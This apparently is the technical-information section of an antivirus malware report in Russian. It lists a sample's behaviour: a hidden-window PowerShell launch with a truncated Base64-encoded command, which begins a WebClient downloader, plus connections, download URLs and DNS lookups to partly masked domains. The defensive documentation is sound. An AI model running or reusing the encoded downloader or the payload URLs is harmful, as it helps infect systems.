Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAF8ANgA4AF8AXwA2AD0AKAAnAGkAXwAnACsAJwA2ADUAOQAnACsAJwA2ADUAJwApADsAJABiAF8ANAAyADQAOQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABjAF8AXwAxADIANQAzADYAPQAoAC...
- 'pr######.##296248.cp.regruhosting.ru':80
- 'ku###-vivat.ru':80
- 'ku###-vivat.ru':443
- http://pr######.##296248.cp.regruhosting.ru/l29uxpBrAX
- http://ku###-vivat.ru/q2ECLyVCmWNeG_z2gp
- 'ku###-vivat.ru':443
- DNS ASK pr######.##296248.cp.regruhosting.ru
- DNS ASK fa##sys.in
- DNS ASK ev####odybags.com
- DNS ASK ey###opper.ru
- DNS ASK ku###-vivat.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAF8ANgA4AF8AXwA2AD0AKAAnAGkAXwAnACsAJwA2ADUAOQAnACsAJwA2ADUAJwApADsAJABiAF8ANAAyADQAOQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABjAF8AXwAxADIANQAzADYAPQAoAC...' (со скрытым окном)